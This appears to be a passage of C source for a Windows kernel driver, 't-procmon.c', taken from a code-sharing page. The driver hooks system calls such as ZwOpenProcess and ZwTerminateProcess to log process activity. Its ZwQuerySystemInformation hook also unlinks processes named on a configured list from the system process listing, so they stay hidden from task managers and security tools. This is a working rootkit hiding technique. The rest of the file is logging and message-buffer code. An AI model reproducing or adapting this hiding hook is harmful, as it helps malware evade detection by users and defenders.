📄 t-procmon.c
字号:
TCHAR pMessage[256];
TCHAR pOperation[32] = "ZwQuerySystemInformation";
GetProcessName(pMessage,pOperation);
if(SystemInformationClass == 5)
{
DbgPrint("ZwQuerySystemInformation for Process/Thead\n");
}
NtStatus = (OldZwQuerySystemInformation)(SystemInformationClass,
SystemInformation,
SystemInformaitonLength,
ReturnLength);
if(NT_SUCCESS(NtStatus) && SystemInformationClass == 5)
{
for(dwCount = 0; dwCount < 2; dwCount ++)
{
ProcCur = (PSYSTEM_PROCESSES)SystemInformation;
while(ProcCur != NULL)
{
pCurrentNK = pFirstNK;
while(pCurrentNK != NULL)
{
if(RtlCompareUnicodeString(&pCurrentNK->Name,&ProcCur->ProcessName,TRUE) == 0)
{
RtlUnicodeStringToAnsiString(&ProcNameA,&pCurrentNK->Name,TRUE);
DbgPrint("Hidden Process Name: %s\n",ProcNameA.Buffer);
if(ProcPre != NULL)
{
if(ProcCur->NextEntryDelta != 0)
{
ProcPre->NextEntryDelta += ProcCur->NextEntryDelta;
}
else
{
ProcPre->NextEntryDelta = 0;
}
}
else
{
if(ProcCur->NextEntryDelta != 0)
{
SystemInformation = (PSYSTEM_PROCESSES)((PTSTR)ProcCur + ProcCur->NextEntryDelta);
}
else
{
SystemInformation = NULL;
}
}
break;
}
else
{
pCurrentNK = pCurrentNK->Next;
}
}
ProcPre = ProcCur;
if(ProcCur->NextEntryDelta != 0)
{
ProcCur = (PSYSTEM_PROCESSES)((PTSTR)ProcCur + ProcCur->NextEntryDelta);
}
else
{
ProcCur = NULL;
}
}
}
UpdateMessageK(Sequence++,(PTSTR)pMessage);
}
return NtStatus;
}
NTSTATUS
NewZwOpenProcess(
OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL)
{
NTSTATUS NtStatus;
TCHAR pMessage[256];
TCHAR pOperation[32] = "ZwOpenProcess";
GetProcessName(pMessage,pOperation);
NtStatus = (OldZwOpenProcess)(ProcessHandle,
DesiredAccess,
ObjectAttributes,
ClientId);
UpdateMessageK(Sequence++,(PTSTR)pMessage);
return NtStatus;
}
NTSTATUS
NewZwTerminateProcess(
IN HANDLE ProcessHandle OPTIONAL,
IN NTSTATUS ExitStatus)
{
NTSTATUS NtStatus;
TCHAR pMessage[256];
TCHAR pOperation[32] = "ZwTerminateProcess";
GetProcessName(pMessage,pOperation);
NtStatus = (OldZwTerminateProcess)(ProcessHandle,
ExitStatus);
UpdateMessageK(Sequence++,(PTSTR)pMessage);
return NtStatus;
}
NTSTATUS
NewZwQueryInformationProcess(
IN HANDLE ProcessHandle,
IN PROCESSINFOCLASS ProcessInformationClass,
OUT PVOID ProcessInformation,
IN ULONG ProcessInformationLength,
OUT PULONG ReturnLength OPTIONAL)
{
NTSTATUS NtStatus;
TCHAR pMessage[256];
TCHAR pOperation[32] = "ZwQueryInformationProcess";
GetProcessName(pMessage,pOperation);
NtStatus = (OldZwQueryInformationProcess)(ProcessHandle,
ProcessInformationClass,
ProcessInformation,
ProcessInformationLength,
ReturnLength);
UpdateMessageK(Sequence++,(PTSTR)pMessage);
return NtStatus;
}
NTSTATUS
NewZwSetInformationProcess(
IN HANDLE ProcessHandle,
IN PROCESSINFOCLASS ProcessInformationClass,
IN PVOID ProcessInformation,
IN ULONG ProcessInformationLength)
{
NTSTATUS NtStatus;
TCHAR pMessage[256];
TCHAR pOperation[32] = "ZwSetInformationProcess";
GetProcessName(pMessage,pOperation);
NtStatus = (OldZwSetInformationProcess)(ProcessHandle,
ProcessInformationClass,
ProcessInformation,
ProcessInformationLength);
UpdateMessageK(Sequence++,(PTSTR)pMessage);
return NtStatus;
}
VOID
GetProcessNameOffset()
{
PEPROCESS pEProcess;
ULONG i;
TCHAR SYSNAME[] = "System";
pEProcess = PsGetCurrentProcess();
for( i = 0; i < 3*PAGE_SIZE; i++ )
{
if( !strncmp(SYSNAME,(PTSTR)((ULONG)pEProcess + i),strlen(SYSNAME)))
{
NameOffset = i;
DbgPrint("*********** NameOffset == 0x%x ***********\n",NameOffset);
}
}
return ;
}
VOID
GetProcessName(PTSTR pMessage,PTSTR pOperation)
{
TCHAR pProcessName[32];
PEPROCESS pEProcess;
// pEProcess = PsGetCurrentProcess();
// strncpy(pProcessName,(PTSTR)((ULONG)pEProcess + NameOffset),16);
sprintf(pMessage,"%d\t%s",PsGetCurrentProcessId(),pOperation);
DbgPrint("%s\n",pMessage);
return ;
}
VOID
FreeProcessNameK(VOID)
{
PPROCNAMEK pCurrentNK;
while(pFirstNK != NULL)
{
pCurrentNK = pFirstNK->Next;
ExFreePool(pFirstNK);
pFirstNK = pCurrentNK;
}
return ;
}
VOID
FreeMessageK(VOID)
{
PMESSAGEK pNextMK;
pCurrentMK = pFirstMK;
while(pCurrentMK != NULL)
{
pNextMK = pCurrentMK->Next;
ExFreePool(pCurrentMK);
pCurrentMK = pNextMK;
}
return ;
}
VOID
NewMessageK(VOID)
{
PMESSAGEK pNewMK = NULL;
if(NumMessageK == MaxMessageK)
{
pCurrentMK->Length = 0;
return ;
}
if(pCurrentMK->Length == 0)
{
return ;
}
pNewMK = ExAllocatePool(NonPagedPool,sizeof(MESSAGEK));
if(pNewMK != NULL)
{
if(pCurrentMK == NULL && pFirstMK == NULL)
{
pFirstMK = pNewMK;
pCurrentMK = pNewMK;
}
else
{
pCurrentMK->Next = pNewMK;
pCurrentMK = pNewMK;
}
pCurrentMK->Length = 0;
pCurrentMK->Next = NULL;
NumMessageK++;
}
else
{
pCurrentMK->Length = 0;
}
return ;
}
VOID
ResetMessageK(VOID)
{
PMESSAGEK pNextMK;
pCurrentMK = pFirstMK->Next;
while(pCurrentMK != NULL)
{
pNextMK = pCurrentMK->Next;
ExFreePool(pCurrentMK);
pCurrentMK = pNextMK;
}
pFirstMK->Next = NULL;
pFirstMK->Length = 0;
return ;
}
VOID
UpdateMessageK(
ULONG Seq,
PTSTR pData)
{
PMESSAGEU pTempMU;
ULONG TempLength = 0;
if(pCurrentMK->Length > MAX_MESSAGE - 500)
{
NewMessageK();
}
pTempMU = (PMESSAGEU)(pCurrentMK->Message + pCurrentMK->Length);
if(pTempMU == NULL)
{
DbgPrint("pTempMU == NULL\n");
}
else
{
MUTEX_P(MKMutex);
pTempMU->Sequence = Seq;
TempLength = sprintf(pTempMU->Message,"%s",pData);
pCurrentMK->Length += sizeof(Seq) + TempLength + 1;
MUTEX_V(MKMutex);
}
return ;
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -